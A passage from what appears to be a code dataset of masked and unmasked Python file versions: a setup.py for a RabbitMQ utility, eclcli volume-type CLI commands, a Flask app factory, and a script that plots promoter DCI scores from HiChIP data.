"step-2": "<mask token>\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\n<mask token>\nsetuptools.setup(name=NAME, version=VERSION, author=AUTHOR, author_email=\n '[email protected]', description=\n 'a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)',\n long_description=long_description, long_description_content_type=\n 'text/markdown', url='https://github.com/smilefufu/PIKACHU', data_files\n =[('', ['LICENSE'])], packages=setuptools.find_packages(),\n install_requires=['pika'], classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'))\n",
"step-3": "<mask token>\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\nNAME, AUTHOR, VERSION = get_info()\nsys.dont_write_bytecode = True\nsetuptools.setup(name=NAME, version=VERSION, author=AUTHOR, author_email=\n '[email protected]', description=\n 'a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)',\n long_description=long_description, long_description_content_type=\n 'text/markdown', url='https://github.com/smilefufu/PIKACHU', data_files\n =[('', ['LICENSE'])], packages=setuptools.find_packages(),\n install_requires=['pika'], classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'))\n",
"step-4": "import sys\nimport setuptools\nfrom distutils.core import setup\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if '=' in line:\n exec(compile(line, '', 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\n\nNAME, AUTHOR, VERSION = get_info()\nsys.dont_write_bytecode = True\nsetuptools.setup(name=NAME, version=VERSION, author=AUTHOR, author_email=\n '[email protected]', description=\n 'a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)',\n long_description=long_description, long_description_content_type=\n 'text/markdown', url='https://github.com/smilefufu/PIKACHU', data_files\n =[('', ['LICENSE'])], packages=setuptools.find_packages(),\n install_requires=['pika'], classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'))\n",
"step-5": "# -*- coding: utf-8 -*-\n\nimport sys\nimport setuptools\nfrom distutils.core import setup\n\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\ndef get_info():\n init_file = 'PIKACHU/__init__.py'\n with open(init_file, 'r') as f:\n for line in f.readlines():\n if \"=\" in line:\n exec(compile(line, \"\", 'exec'))\n return locals()['name'], locals()['author'], locals()['version']\n\nNAME, AUTHOR, VERSION = get_info()\n\nsys.dont_write_bytecode = True\nsetuptools.setup(\n name=NAME,\n version=VERSION,\n author=AUTHOR,\n author_email=\"[email protected]\",\n description=\"a PIKA based, Cuter and more Human rabbitmq queue Utility (´_ゝ`)\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/smilefufu/PIKACHU\",\n data_files = [(\"\", [\"LICENSE\"])],\n packages=setuptools.find_packages(),\n install_requires=[\n \"pika\",\n ],\n classifiers=(\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: OS Independent'\n ),\n)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
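The `get_info()` helper above exec's every line of `PIKACHU/__init__.py` that contains an `=` and then reads `name`, `author`, and `version` back out of `locals()`, so it expects that file to hold simple top-level assignments (for example `name = "PIKACHU"`, `version = "0.1.0"`; the exact values here are illustrative). A sketch of an alternative that parses the file instead of executing it, under the same layout assumption:

# Assumes PIKACHU/__init__.py contains plain constant assignments for
# name/author/version (actual values unknown here); parses them without exec().
import ast
from pathlib import Path

def read_metadata(init_file: str = "PIKACHU/__init__.py") -> dict:
    metadata = {}
    for node in ast.parse(Path(init_file).read_text()).body:
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    metadata[target.id] = node.value.value
    return metadata

# Hypothetical usage: NAME, AUTHOR, VERSION = (read_metadata()[k] for k in ("name", "author", "version"))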
import copy
import six
from eclcli.common import command
from eclcli.common import utils
from eclcli.storage.storageclient import exceptions
class ListVolumeType(command.Lister):
def get_parser(self, prog_name):
parser = super(ListVolumeType, self).get_parser(prog_name)
parser.add_argument(
"--name",
metavar="<string>",
help="Filter results by virtual storage name")
return parser
def take_action(self, parsed_args):
storage_client = self.app.client_manager.storage
search_opts = {
'display_name': parsed_args.name,
}
columns = ['ID', 'Name', 'available_volume_size',
'available_volume_throughput',
'available_iops_per_gb']
column_headers = copy.deepcopy(columns)
data = storage_client.volume_types.list(search_opts=search_opts)
if parsed_args.name is not None:
data = utils.filter_list_with_property(data, "name", parsed_args.name)
for vtype in data:
for key, value in vtype.extra_specs.items():
setattr(vtype, key, value)
return (column_headers,
(utils.get_item_properties(
s, columns,
) for s in data))
class ShowVolumeType(command.ShowOne):
def get_parser(self, prog_name):
parser = super(ShowVolumeType, self).get_parser(prog_name)
parser.add_argument(
"volume_type",
metavar="VOLUME_TYPE_ID",
help="volume type to display (ID)")
return parser
def take_action(self, parsed_args):
storage_client = self.app.client_manager.storage
try:
volume_type = storage_client.volume_types.get(parsed_args.volume_type)
printout = volume_type._info
for key, value in printout.get("extra_specs").items():
printout[key] = copy.copy(value)
del printout["extra_specs"]
except exceptions.ClientException as clientexp:
printout = {"message": clientexp.message,
"details": clientexp.details,
"code": clientexp.code}
return zip(*sorted(six.iteritems(printout)))
|
normal
|
{
"blob_id": "c73bea686786a30f298500968cfd01e2d5125d75",
"index": 4013,
"step-1": "<mask token>\n\n\nclass ListVolumeType(command.Lister):\n <mask token>\n <mask token>\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-2": "<mask token>\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument('--name', metavar='<string>', help=\n 'Filter results by virtual storage name')\n return parser\n <mask token>\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-3": "<mask token>\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument('--name', metavar='<string>', help=\n 'Filter results by virtual storage name')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n search_opts = {'display_name': parsed_args.name}\n columns = ['ID', 'Name', 'available_volume_size',\n 'available_volume_throughput', 'available_iops_per_gb']\n column_headers = copy.deepcopy(columns)\n data = storage_client.volume_types.list(search_opts=search_opts)\n if parsed_args.name is not None:\n data = utils.filter_list_with_property(data, 'name',\n parsed_args.name)\n for vtype in data:\n for key, value in vtype.extra_specs.items():\n setattr(vtype, key, value)\n return column_headers, (utils.get_item_properties(s, columns) for s in\n data)\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-4": "import copy\nimport six\nfrom eclcli.common import command\nfrom eclcli.common import utils\nfrom eclcli.storage.storageclient import exceptions\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument('--name', metavar='<string>', help=\n 'Filter results by virtual storage name')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n search_opts = {'display_name': parsed_args.name}\n columns = ['ID', 'Name', 'available_volume_size',\n 'available_volume_throughput', 'available_iops_per_gb']\n column_headers = copy.deepcopy(columns)\n data = storage_client.volume_types.list(search_opts=search_opts)\n if parsed_args.name is not None:\n data = utils.filter_list_with_property(data, 'name',\n parsed_args.name)\n for vtype in data:\n for key, value in vtype.extra_specs.items():\n setattr(vtype, key, value)\n return column_headers, (utils.get_item_properties(s, columns) for s in\n data)\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument('volume_type', metavar='VOLUME_TYPE_ID', help=\n 'volume type to display (ID)')\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.\n volume_type)\n printout = volume_type._info\n for key, value in printout.get('extra_specs').items():\n printout[key] = copy.copy(value)\n del printout['extra_specs']\n except exceptions.ClientException as clientexp:\n printout = {'message': clientexp.message, 'details': clientexp.\n details, 'code': clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-5": "import copy\n\nimport six\n\nfrom eclcli.common import command\nfrom eclcli.common import utils\nfrom eclcli.storage.storageclient import exceptions\n\n\nclass ListVolumeType(command.Lister):\n\n def get_parser(self, prog_name):\n parser = super(ListVolumeType, self).get_parser(prog_name)\n parser.add_argument(\n \"--name\",\n metavar=\"<string>\",\n help=\"Filter results by virtual storage name\")\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n\n search_opts = {\n 'display_name': parsed_args.name,\n }\n\n columns = ['ID', 'Name', 'available_volume_size',\n 'available_volume_throughput',\n 'available_iops_per_gb']\n column_headers = copy.deepcopy(columns)\n\n data = storage_client.volume_types.list(search_opts=search_opts)\n\n if parsed_args.name is not None:\n data = utils.filter_list_with_property(data, \"name\", parsed_args.name)\n\n for vtype in data:\n for key, value in vtype.extra_specs.items():\n setattr(vtype, key, value)\n\n return (column_headers,\n (utils.get_item_properties(\n s, columns,\n ) for s in data))\n\n\nclass ShowVolumeType(command.ShowOne):\n\n def get_parser(self, prog_name):\n parser = super(ShowVolumeType, self).get_parser(prog_name)\n parser.add_argument(\n \"volume_type\",\n metavar=\"VOLUME_TYPE_ID\",\n help=\"volume type to display (ID)\")\n return parser\n\n def take_action(self, parsed_args):\n storage_client = self.app.client_manager.storage\n try:\n volume_type = storage_client.volume_types.get(parsed_args.volume_type)\n printout = volume_type._info\n for key, value in printout.get(\"extra_specs\").items():\n printout[key] = copy.copy(value)\n del printout[\"extra_specs\"]\n except exceptions.ClientException as clientexp:\n printout = {\"message\": clientexp.message,\n \"details\": clientexp.details,\n \"code\": clientexp.code}\n return zip(*sorted(six.iteritems(printout)))\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from flask import Flask, render_template
from config import Config
from flask_bootstrap import Bootstrap
from config import config_options
from flask_login import LoginManager
from flask_wtf.csrf import CSRFProtect
from flask_sqlalchemy import SQLAlchemy
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'  # Flask-Login redirect target for @login_required
bootstrap = Bootstrap()
csrf=CSRFProtect()
db = SQLAlchemy()
def create_app(config_name):
app= Flask(__name__)
#create app configs
app.config.from_object(Config)
app.config.from_object(config_options[config_name])
app.config['SECRET_KEY']='d686414d5eeb7d38df7e8c385b2c2c47'
#initializing
bootstrap.init_app(app)
csrf.init_app(app)
db.init_app(app)
#registering
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix = '/authenticate')
return app
|
normal
|
{
"blob_id": "2eecc852a6438db19e0ed55ba6cc6610d76c6ed0",
"index": 2207,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_app(config_name):\n app = Flask(__name__)\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY'] = 'd686414d5eeb7d38df7e8c385b2c2c47'\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix='/authenticate')\n return app\n",
"step-3": "<mask token>\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.loginview = 'auth.login'\nbootstrap = Bootstrap()\ncsrf = CSRFProtect()\ndb = SQLAlchemy()\n\n\ndef create_app(config_name):\n app = Flask(__name__)\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY'] = 'd686414d5eeb7d38df7e8c385b2c2c47'\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix='/authenticate')\n return app\n",
"step-4": "from flask import Flask, render_template\nfrom config import Config\nfrom flask_bootstrap import Bootstrap\nfrom config import config_options\nfrom flask_login import LoginManager\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.loginview = 'auth.login'\nbootstrap = Bootstrap()\ncsrf = CSRFProtect()\ndb = SQLAlchemy()\n\n\ndef create_app(config_name):\n app = Flask(__name__)\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY'] = 'd686414d5eeb7d38df7e8c385b2c2c47'\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix='/authenticate')\n return app\n",
"step-5": "from flask import Flask, render_template\nfrom config import Config\nfrom flask_bootstrap import Bootstrap\nfrom config import config_options\nfrom flask_login import LoginManager\nfrom flask_wtf.csrf import CSRFProtect\nfrom flask_sqlalchemy import SQLAlchemy\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.loginview = 'auth.login'\n\nbootstrap = Bootstrap()\ncsrf=CSRFProtect()\ndb = SQLAlchemy()\n\ndef create_app(config_name):\n \n app= Flask(__name__)\n\n #create app configs\n app.config.from_object(Config)\n app.config.from_object(config_options[config_name])\n app.config['SECRET_KEY']='d686414d5eeb7d38df7e8c385b2c2c47'\n \n #initializing\n bootstrap.init_app(app)\n csrf.init_app(app)\n db.init_app(app)\n \n #registering\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n \n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint, url_prefix = '/authenticate')\n\n \n return app",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
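Two details of the factory above are worth noting: `SECRET_KEY` is hard-coded after the config objects are loaded, so it silently overrides whatever `Config` or `config_options` set, and `login_manager` is instantiated but never passed to `init_app(app)` inside `create_app()`. A minimal entry-point sketch, where the package name `app`, the `'development'` config key, and the port are assumptions:

# Hypothetical entry point for the factory above; module path, config name and
# port are assumptions, and the secret key is taken from the environment.
import os

from app import create_app, db, login_manager   # assumed package layout

app = create_app(os.environ.get("FLASK_CONFIG", "development"))
app.config["SECRET_KEY"] = os.environ.get("SECRET_KEY", app.config["SECRET_KEY"])
login_manager.init_app(app)                      # not done inside create_app()

if __name__ == "__main__":
    with app.app_context():
        db.create_all()                          # create tables for registered models
    app.run(port=5000, debug=True)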
import sys,argparse
import os,glob
import numpy as np
import pandas as pd
import re,bisect
from scipy import stats
import matplotlib
# matplotlib.use('Agg')
import matplotlib.pyplot as plt
matplotlib.rcParams['font.size']=11
import seaborn as sns
sns.set(font_scale=1.1)
sns.set_style("whitegrid", {'axes.grid' : False})
sns.set_style("ticks",{'ytick.color': 'k','axes.edgecolor': 'k'})
matplotlib.rcParams["font.sans-serif"] = ["Arial"]
matplotlib.rcParams['mathtext.fontset'] = 'custom'
matplotlib.rcParams["mathtext.rm"] = "Arial"
# def return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):
# dci_file = '{}/{}/{}_{}{}.bed'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)
# dci_df = pd.read_csv(dci_file,sep='\t',header=None)
# dci_df.columns=['chr','start','end','DCI']
# dci_df.index = ['_'.join(ii) for ii in dci_df[['chr','start','end']].values.astype(str)]
# return dci_df
def return_dci_df(DCI_dir,subdir,hm_mark,compr_type,suffix):
dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_type,suffix)
if os.path.isfile(dci_file):
dci_df = pd.read_csv(dci_file,sep='\t',index_col=4)
dci_df.columns=['chr','start','end','IfOverlap','score','strand','DCI']
return dci_df
else:
return None
def scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre):
compr_x = compr_type[0]
compr_y = compr_type[1]
test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,compr_y,suffix)
# print(test_file)
if os.path.isfile(test_file):
dci_df_wt_over_vector = return_dci_df(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)
up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']>dci_thre].index
dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI']<-1*dci_thre].index
dci_df_x = return_dci_df(DCI_dir,subdir,hm_mark,compr_x,suffix)
dci_df_y = return_dci_df(DCI_dir,subdir,hm_mark,compr_y,suffix)
# scatter plot
plt.figure(figsize=(2.1,2.1))
plt.scatter(dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI'],c='tab:grey',s=3,alpha=1,rasterized=True,label='All genes')
plt.scatter(dci_df_x.loc[up_bins,'DCI'],dci_df_y.loc[up_bins,'DCI'],c='tab:red',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$>{}$ in WT/Vector'.format(dci_thre))
plt.scatter(dci_df_x.loc[dn_bins,'DCI'],dci_df_y.loc[dn_bins,'DCI'],c='tab:blue',s=3,alpha=1,rasterized=True,label='Genes w/ DCI$<{}$ in WT/Vector'.format(-1*dci_thre))
# save and plot the correlation
x,y = dci_df_x.loc[:,'DCI'],dci_df_y.loc[:,'DCI']
slope, intercept, r_value, p_value, std_err = stats.linregress(x, y)
output_prename = '{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre)
num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_s'] = r_value
num_DCI_bins_df.loc[output_prename,'scatter_pearsonr_p'] = p_value
x_sort = np.sort(x)
plt.plot(x_sort,x_sort*slope+intercept,c = 'k',ls='--',lw=.8)
plt.text(.97,.97,'$r={:.2f}$ '.format(r_value),fontsize=10,transform=plt.axes().transAxes,ha='right',va='top')
plt.axhline(y=0,c='k',lw=1)
plt.axvline(x=0,c='k',lw=1)
# # plt.title('{} over {}'.format(cellType_labels[treatment],cellType_labels[control]))
plt.legend(fontsize=10.5,borderaxespad=0.1,labelspacing=.1,handletextpad=0.1,\
handlelength=1,loc="upper left",markerscale=3,bbox_to_anchor=[-0.12,1.36],frameon=False)
xa,xb = cellType_labels[compr_x.split('_')[0]],cellType_labels[compr_x.split('_')[-1]]
ya,yb = cellType_labels[compr_y.split('_')[0]],cellType_labels[compr_y.split('_')[-1]]
plt.xlabel('DCI score ({} over {})'.format(xa,xb),fontsize=12)
plt.ylabel('DCI score ({} over {})'.format(ya,yb),fontsize=12)
plt.savefig('{}/{}/scatter_{}_{}_vs_{}{}_dci{}.png'.format(outdir,subdir,hm_mark,compr_x,compr_y,suffix,dci_thre),\
bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)
plt.show()
plt.close()
return up_bins,dn_bins
return [],[]
def plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,flag):
test_file='{}/{}/{}_{}{}.csv'.format(DCI_dir,subdir,hm_mark,'WT_over_Vector',suffix)
if os.path.isfile(test_file):
box_vals = []
xticklabels = []
sig_vals,sig_colors = [],[]
for compr_col in ['WT_over_Vector','DEL_over_WT','EIF_over_DEL','TPR_over_WT']:
dci_df = return_dci_df(DCI_dir,subdir,hm_mark,compr_col,suffix)
if dci_df is not None:
box_val = dci_df.loc[selected_bins]['DCI'].values
# save the values in box plots
dci_df.loc[selected_bins].to_csv('{}/{}/box_{}_{}_genes{}_dci{}_{}.csv'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre,compr_col))
s,p = stats.ttest_1samp(box_val,0)
sig_vals.append('*' if p<0.05 else '')
sig_colors.append('b' if s<0 else 'r')
box_vals.append(box_val)
xa,xb = cellType_labels[compr_col.split('_')[0]],cellType_labels[compr_col.split('_')[-1]]
xticklabels.append('{} over {}'.format(xa,xb))
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} s'.format(title.split()[2],compr_col)] = '{:.2f}'.format(s)
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'{} {} p'.format(title.split()[2],compr_col)] = '{:.2e}'.format(p)
#print(box_vals)
positions = np.arange(len(box_vals))
fig = plt.figure(figsize=(.46*len(box_vals),2.2))
g = plt.boxplot(box_vals,positions=positions,widths = .5,patch_artist=True,\
boxprops=dict(color='k',facecolor='w',fill=None,lw=1),\
medianprops=dict(color='k'),showfliers=False)
# g = plt.violinplot(box_vals)
# for position_id in np.arange(len(positions)):
# scatter_x = np.random.normal(positions[position_id],0.06,len(box_vals[position_id]))
# plt.scatter(scatter_x,box_vals[position_id],color=color,s=5,zorder=0,alpha=0.6,rasterized=True)
# for compr_pos in [[0,1,'t'],[1,2,'t'],[2,3,'t']]:
# mark_pvalue(compr_pos,positions,box_vals)
plt.axes().set_xticklabels(xticklabels,rotation=30,ha='right',fontsize=12)
plt.ylabel('DCI score'.format(hm_mark),fontsize=13)
# plt.ylim([-1,2])
for ii in positions:
plt.scatter(ii,np.median(box_vals[ii]),marker=sig_vals[ii],color='red',s=77)
# plt.axes().text(ii,0,sig_vals[ii-1],fontsize=28,va='top',ha='center',color='red')
plt.axhline(y=0,c='k',lw=1)
plt.title(title,fontsize=12)
# plt.legend(fontsize=16,borderaxespad=0.2,labelspacing=.2,handletextpad=0.2,handlelength=1,loc="upper right",frameon=False)
plt.savefig('{}/{}/box_{}_{}_genes{}_dci{}.png'.format(outdir,subdir,hm_mark,flag,suffix,dci_thre),\
bbox_inches='tight',pad_inches=0.1,dpi=600,transparent=True)
plt.show()
plt.close()
# ==== main()
cellType_labels= {'Vector':'Vector',\
'WT':'WT',\
'DEL':'$\Delta$cIDR',\
'EIF':'UTX-eIF$_{IDR}$',\
'TPR':'$\Delta$TPR',\
'MT2':'MT2',\
'FUS':'UTX-FUS$_{IDR}$'}
outdir = 'f4_promoter_DCI_scatter'
os.makedirs(outdir,exist_ok=True)
# project_dir="/nv/vol190/zanglab/zw5j/since2019_projects/UTX_HaoJiang"
project_dir="/Volumes/zanglab/zw5j/since2019_projects/UTX_HaoJiang"
# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f2_DEG_promoter_DCI_non_normalized/f1_promoter_DCI_rename'.format(project_dir)
DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f1_DEG_promoter_DCI/f1_promoter_DCI'.format(project_dir)
# DCI_dir='{}/f5_hichip/f1_hichip_bart3d_new/f0_run_bart3d_new/bart3d_DCI_rename'.format(project_dir)
# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/f1_deseq2_out'.format(project_dir)
# expr_dir='{}/f0_data_process/rna_seq/data_1st_submit_STAR_RSEM_new/f6_deg/fz_deseq2_out_combined'.format(project_dir)
# deg_df = pd.read_csv('{}/deseq2_combined.csv'.format(expr_dir),index_col=0)
subdirs=['bart3d_dis200k_data_1st_submit','bart3d_dis200k_data202008',
'bart3d_dis500k_data_1st_submit','bart3d_dis500k_data202008']
compr_types = [['WT_over_Vector','DEL_over_WT'],['DEL_over_WT','EIF_over_DEL'],['WT_over_Vector','TPR_over_WT']]
hm_marks = ['H3K4me3','H3K27ac']
suffixes=['_promoter_DCI']
dci_thres = [2,5]
num_DCI_bins_df = pd.DataFrame()
for subdir in subdirs[1:2]:
outdir_tmp='{}/{}'.format(outdir,subdir)
os.makedirs(outdir_tmp,exist_ok=True)
for hm_mark in hm_marks[:]:
for suffix in suffixes[:]:
for dci_thre in dci_thres[1:]:
for compr_type in compr_types[:]:
up_bins,dn_bins = scatter_plot_compr_DCI(num_DCI_bins_df,subdir,hm_mark,compr_type,suffix,dci_thre)
# the box plot are exactly the same
if compr_type[1]=='DEL_over_WT':
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# up genes'] = len(up_bins)
num_DCI_bins_df.loc['{}_{}_{}_dci{}'.format(subdir,hm_mark,suffix,dci_thre),'# dn genes'] = len(dn_bins)
##### box plot
selected_bins = up_bins
color = 'tab:red'
title = 'Genes w/ DCI$>{}$ \n in WT over Vector'.format(dci_thre)
plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'increased')
selected_bins = dn_bins
color = 'tab:blue'
title = 'Genes w/ DCI$<{}$ \n in WT over Vector'.format(-1*dci_thre)
plot_box_figs(subdir,hm_mark,suffix,selected_bins,color,title,dci_thre,num_DCI_bins_df,'decreased')
num_DCI_bins_df.to_csv(outdir+os.sep+'num_DCI_promoter_summary.csv')
|
normal
|
{
"blob_id": "4ee47435bff1b0b4a7877c06fb13d13cf53b7fce",
"index": 3910,
"step-1": "<mask token>\n\n\ndef return_dci_df(DCI_dir, subdir, hm_mark, compr_type, suffix):\n dci_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_type, suffix)\n if os.path.isfile(dci_file):\n dci_df = pd.read_csv(dci_file, sep='\\t', index_col=4)\n dci_df.columns = ['chr', 'start', 'end', 'IfOverlap', 'score',\n 'strand', 'DCI']\n return dci_df\n else:\n return None\n\n\ndef scatter_plot_compr_DCI(num_DCI_bins_df, subdir, hm_mark, compr_type,\n suffix, dci_thre):\n compr_x = compr_type[0]\n compr_y = compr_type[1]\n test_file = '{}/{}/{}_{}{}.csv'.format(DCI_dir, subdir, hm_mark,\n compr_y, suffix)\n if os.path.isfile(test_file):\n dci_df_wt_over_vector = return_dci_df(DCI_dir, subdir, hm_mark,\n 'WT_over_Vector', suffix)\n up_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] > dci_thre\n ].index\n dn_bins = dci_df_wt_over_vector[dci_df_wt_over_vector['DCI'] < -1 *\n dci_thre].index\n dci_df_x = return_dci_df(DCI_dir, subdir, hm_mark, compr_x, suffix)\n dci_df_y = return_dci_df(DCI_dir, subdir, hm_mark, compr_y, suffix)\n plt.figure(figsize=(2.1, 2.1))\n plt.scatter(dci_df_x.loc[:, 'DCI'], dci_df_y.loc[:, 'DCI'], c=\n 'tab:grey', s=3, alpha=1, rasterized=True, label='All genes')\n plt.scatter(dci_df_x.loc[up_bins, 'DCI'], dci_df_y.loc[up_bins,\n 'DCI'], c='tab:red', s=3, alpha=1, rasterized=True, label=\n 'Genes w/ 